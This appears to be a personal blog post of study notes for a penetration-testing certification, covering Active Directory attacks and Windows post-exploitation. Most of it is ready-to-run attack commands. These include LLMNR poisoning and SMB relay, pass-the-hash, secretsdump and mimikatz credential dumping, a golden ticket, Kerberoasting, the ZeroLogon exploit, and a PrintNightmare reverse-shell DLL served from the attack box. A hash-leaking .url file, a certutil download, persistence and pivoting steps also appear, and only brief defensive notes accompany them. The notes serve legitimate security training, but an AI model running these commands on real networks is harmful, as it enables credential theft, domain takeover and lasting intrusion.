Home PNPT Notes
Post
Cancel

PNPT Notes

Active Directory Attacks

LLMNR Poisoning

Link local multicast name resolution, used when DNS fails to resolve a hostname, can be an easy win if LLMNR is not disabled in the environment and users have weak credentials. Use responder from the impacket suite to listen on an interface, works better at times with high traffic..

1
Python responder.py -I eth0 -rdwv

If certain events occur, you can obtain a username and NTLM hash, which can be cracked with john or hashcat.

1
john --wordlist=/path/to/rockyou.txt /path/to/hash.txt

hashcat -m 5600 /path/to/hash.txt /path/to/rockyou.txt (5600 is the module for NTLMv2)

Hashcat binary can be downloaded here, and should be ran on base OS.

Defending against LLMNR attacks

Best defense against this attack is to simply disable LLMNR and NBT-NS, if they can not be disabled then strong access controls and strong passwords should be enforced on the network.

SMB Relay Attacks

Instead of cracking the hash, we can also use it to gain access to a machine if our stolen user hash represents a local admin on the target machine. SMB signing must be disabled for this to work.

Edit the responder.conf file and turn off SMB and HTTP servers, run responder –> responder is only capturing hashes, ntlmrelayx will do the actual relay.

1
python ntlmrelayx.py -tf targets.txt -smb2support

Can dump the SAM file –> get access to local user hashes.

Add -i argument to get an interactive shell spawned on your machine. “started interacvtive SMB client shell via TCP on localhost:11000” -> use netcat to interract, can view/modify/

Enumerating hosts with SMB signing disabled

1
nmap --script=smb2-security-mode.nse -p 445 192.168.1.0/24

Disabled by default on workstations, enabled and required by default on servers. enabled but not required = vulnerable.

Defending against SMB relay attacks

Enable SMB signing on all devices, disable NTLM authentication, account tiering (least priv.), local admin restriction.

IPv6 Attacks

Clone MiTM6 and run “pip3 install” in the directory.

Starting by running

1
mitm6 -d domain.local

and concurrently run

1
ntlmrelayx.py -6 -t ldaps://dc.ip.add.res -wh fakewpad.domain.local -l lootme

Very extensive tool, can create new users/update ACLs, dump creds, gather info, etc.

Post Compromise Enumeration

PowerView

Download on victim machine, and run

powershell.exe -ep bypass
.\PowerView.ps1

Get-NetDomain - gives general information about the domain, forest name, DCs, etc.

Get-NetDomainController - gives more specific information about the DCs, IP addresses, names, etc.

Get-DomainPolicy - can see GPs on the domain, Kerberos, System Access, version,

(Get-DomainPolicy)”system access” - can see the system access policies: min. password age, password complexity, password length, etc.

Get-NetUser - dumps info on all users

Get-NetUserselect cn - will give users
Get-NetUserselect samaccountname - will give account names

Get-UserProperty - lists all potential user properties

Get-UserProperty -Properties pwdlastset - will show when all users had their passwords last reset

Get-UserProperty -Properties logoncount - can potentially find honeypot accounts with low logon #s

Get-NetComputer - will list all computers

Get-NetComputer -FullData - will dump tons of info about all computers

Get-NetComputer -FullDataselect OperatingSystem - will show all computer operating systems

Get-NetGroup - shows groups

Get-NetGroup -GroupName “Domain Admins”

Get-NetGroupMember -GroupName “Domain Admins”

Invoke-ShareFinder - SMB enum

Get-NetGPO

Get-NetGPOselect displayname, whenchanged

Bloodhound

Downloads data from AD and displays it in GUI, figures out shortest path to DA.

1
2
3
apt install bloodhound;
neo4j console;
bloodhound

After changing the default password, you can start pulling data from the environment by downloading sharphound on the victim machine.

powershell -ep bypass
1
2
.\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain Domain.local -ZipFileName file.zip

Transfer the file to attack machine, and upload it to bloodhound.

Post Compromise Attacks

Pass the Hash / Pass

1
crackmapexec 10.10.10.0/24 -u user -d DOMAIN -p password

Will spray the network with the user’s creds, can be done with the user’s password hash as well.

1
2
3
crackmapexec smb 10.10.10.0/24 -u "user" -H hash --local-auth
or
psexec.py "user":@ipaddress -hashes <hash>

Dumping Hashes with secretsdump.py

1
secretsdump.py domain/user:pass@ipaddress

can dump SAM hashes, LSA secrets, api keys.

1
hashcat64.exe -m 1000 hashes.txt rockyou.txt

-m 1000 is for NTLM

Token Impersonation

A token is a temporary key that allows you to access a system or network without having to provide creds for every action you take. There are 2 types of tokens:

  1. Delegate- Created for logging into a machine or using RDP
  2. Impersonate- “Non-interactive” such as attaching a network drive or a domain logon script.

How to do it with metasploit-

1
2
3
4
5
6
7
8
9
10
11
msfconsole
use exploit/windows/smb/psexec
set rhosts <dc ip address>
set smbdomain <domain.local>
set smbpass <pass>
set smbuser <user>
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run

If all is good, you’ll be in a shell, lots of tools we can load like mimikatz, powershell, incognito. If a user has logged into the machine, you may be able to impersonate them with their token using incognito.

1
2
3
4
load incognito
list_tokens -u
impersonate_token <domain>\\<user>
shell

will place you in a shell as the new user.

1
rev2self

to revert to your original shell.

Kerberoasting

How Kerberos works - suppose a user is attempting to access an application server.

  1. User requests a TGT (Ticket Granting Ticket) from the domain controller (key distribution center), the KDC verifies the username and NTLM hash.
  2. If the credentials are valid, the user receives TGT from the DC, encrypted with the krbtgt hash.
  3. The user provides the TGT back to the DC, this time requesting a TGS (Ticket Granting Service Ticket)
  4. DC verifies TGT by decrypting with it’s own hash, then sends the user a TGS encrypted with the application server’s hash.
  5. User sends the encrypted TGS to the application server, who can decrypt it with it’s own hash and authenticate the user.
  6. User and Application server have now mutually authenticated each other securely, good job Microsoft!

In short, valid creds -> TGT -> TGS -> access to service

Instead of using the TGS to authenticate to a server, we can crack the hash and BECOME the server.

1
python GetUserSPNs.py domain.local/user:pass -dc-ip <dc ip> -request

Requests a service ticket and sends you the hash, which can be cracked with hashcat (-m 13100 for krb-TGS). Because we are exploiting a feature of Kerberos, you can not prevent this attack; it can only mitigated with strong passwords (30 characters+ for service accounts) and following the rules of least privilege.

GPP / cPassword Attacks

Group Policy Preferences allowed admins to create policies using embedded credentials. These creds would be encrypted and placed in the “Groups.xml” file, which resides in the SYSVOL folder and can be read by any user. This file will contain the encrypted “cPassword”, which can be decrypted easily using gpp-decrypt (default on Kali). Can use Invoke-GPP to check for this automatically. Always look for this on older servers, could be an easy win.

URL Attacks

Need access to a file share to do this, either through a user account (post exploit) or on a wide open share (less likely). Make a file that contains this-

1
2
3
4
5
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<attackbox IP>\%USERNAME%.icon
IconIndex=1

The name of the file is important, it must start with an @ or ~ to ensure that it is placed alphabetically at the top of the directory, and must end with the .url extension. The name should be something relevant to the company - “@Q4 financials.url”. Save as type “all files”. When users navigate to the directory, their hash will be sent over to the attackbox, which can be picked up with a responder listener.

Use rpcdump.py from impacket to scan for potentially vulnerable hosts.If it returns a value, it could be vulnerable.

1
rpcdump.py @<Victim IP> | egrep 'MS-RPRN|MS-PAR'

use msfvenom to generate a payload and msfconsole to set the listener

1
2
3
4
5
6
7
8
9
msfvenom -p windows/x64/windows/reverse_tcp LHOST=<listener IP> LPORT=<port> -f dll > shell.dll
msfconsole
use multi/handler
options
set payload windows/x64/windows/reverse_tcp
options
set lport <lport>
set lhost <listener IP>
run

Now we need to host our dll so the target can reach it

1
smbserver.py share 'pwd' -smb2support

Now we just need a user/pass combination (does not have to be administrator).

1
python3 CVE-2021-1675.py domain.local/<user>:<password>@<dc ip> '\\<attack box IP>\share\shell.dll' 

Should get a meterpreter shell on your listener, can proceed with the usual, getuid, hashdump, etc. Most AV will pick up the shell.dll if you don’t obfuscate it in some way.

Mimikatz

A tool built in C used to steal credentials, generate Krb tickets, and leverage attacks such as pass the hash, pass the ticket, golden ticket, etc. Very extensive tool. Use on DC post compromise.

mimikatz.exe
privilege::debug

“Privilege ‘20’ OK” -> good to go

sekurlsa::logonpasswords

Will show computer username/NTLM hash for it, as well as any user who has logged in since last reboot, dumps this information from memory. Can pass the computer’s NTLM hash (not v2) and see if it gives access anywhere on the domain. If a DA has logged into the computer, you can potentially pass their hash or try to crack it.

lsadump::sam
or
lsadump::sam /patch

Doesn’t always work, can try different ways, metasploit, secretsdump, etc.

lsadump::lsa /patch

LSA= local security authority, dumping it will show usernames/ntlm hashes.

Golden Ticket attack with Mimikatz

Golden ticket = complete access to the ENTIRE domain

mimikatz.exe
lsadump::lsa /inject /name:krbtgt

Need to grab 2 things from the output:

S-ID of the domain (looks like S-1-5-32-1045337234-12924708993-5683276719-19000) NTLM hash of the Krbtgt

kerberos::golden /User:Administrator /domain:<domain.local> /sid:<SID> /krbtgt:<krbtgt ntlm hash> /id:500 /ptt

id 500 is associated with Admin, and /ptt specifies pass the ticket. Output should say “golden ticket for ‘Administrator @ ' successfully submitted for current session"

misc::cmd
dir \\<machine>\<drive> jkhdf
or
psexec.exe \\<machine> cmd.exe

Golden ticket can be used for persistence as well.

Zero Logon

CVE-2020-1472. Dangerous attack to run in an environment, sets the DC password to null, if you don’t reset the password you can break the server.

1
2
./zerologon_tester.py <DC netbios name> <DC IP>
python3 cve-2020-1472-exploit.py <DC netbios name> <DC IP>

Use hexpass and restorepassword.py to restore the DC. Easy attack to pull off, scary in the real world.

Post Exploitation

File Transfers

Certutil

certutil.exe -urlcache -f http://<attackbox IP>/malicious.txt malicious.txt

FTP

1
2
python -m pyftpdlib 21
ftp <attacker ip>

Meterpreter shell also has built in ways to upload/download files.

Maintaining Access

Persistence Scripts:

run persistence -h

exploit/windows/local/persistence

exploit/windows/local/registry_persistence

Scheduled Tasks

run scheduleme

run schtaskabuse

Add a User

net user username password /add

Pivoting

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msfconsole
use exploit/windows/smb/psexec
options
set rhosts <victim ip>
set smbpass <password>
set smbuser <user>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <interface>
set target 2
run
shell
route print
arp -a
^C y
run autoroute -s <unreachable subnet>/24
run autoroute -p
background

proxychains, chisel, ssh, lots of different tools.

Clean up

Make the system as it was when you entered it: remove executables, scripts, added files or users, malware, rootkits, and revert settings to their original configuration.

Web Applications

Email Enumeration

hunter(.)io

phonebook(.)cz

tools(.)verifyemailaddress(.)io

Subdomain Enumeration

1
sublist3r -d corp(dot)com

crt(.)sh %.corp.com, does certificate fingerprinting.

Asset Finder

1
2
go get -u github.com/tomnomnom/assetfinder  (Use pimpmykali to fix Go first)
assetfinder domain.com >> output.txt

Amass

1
2
3
export GO111MODULE=on
go get -v -u github.com/OWASP/AMmass/v3/...
amass enum -d domain.com >> subs.txt

httprobe checks if domains are up

1
2
go get -u github.com/tomnomnom/httprobe
cat subdomains.txt | httprobe -s -p https://443

Host Discovery

1
netdiscover -r x.x.x.0/24 will sweep an entire subnet.

OWASP top 10

  1. Injection

  2. Broken Authentication

  3. Sensitive Data Exposure

  4. XML External Entities (XXE)

  5. Broken Access Control

  6. Security Misconfiguration

  7. Cross-Site Scripting

  8. Insecure Deserialization

  9. Using Components with Known Vulnerabilities

  10. Insufficient Logging and Monitoring

Windows Privilege Escalation

Initial Enumeration

Systeminfo command will show basic systeminfo, can refine it more with

systeminfo | findstr /B /C:"OS NAME" /C:"OS VERSION" /C:"System Type"

Can see what version of windows is running, what architecture, etc.

wmic qfe get Caption,Description,HotFixID,InstalledOn

Will show information regarding latest updates.

wmic logicaldisk get caption,description,providername

Will show drives available

User Enumeration

whoami /groups and net user are good ones to run, net localgroup, net localgroup administrators

Network Enumeration

Ipconfig /all , basic network info, might give info on domain.

arp -a and route print also give good info

netstat -ano

Password Hunting

findstr /si password *.txt , *.ini *config

AV Enumeration

sc query windefend

Will show if Windows Defender is running

sc queryex type= service

Will show all services running on machine.

netsh advfirewall dump
or
netsh firewall show state

Will show firewall information.

netsh firewall show config

Shows firewall config

run post/multi/recon/local_exploit_suggester - random metasploit info

Kernel Exploits

Kernel is a program that controls everything in the system. Facilitates interactions between hardware and software components, acts as a translator.

https://github(.)com/SecWiki/windows-kernel-exploits

``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=

This post is licensed under CC BY 4.0 by the author.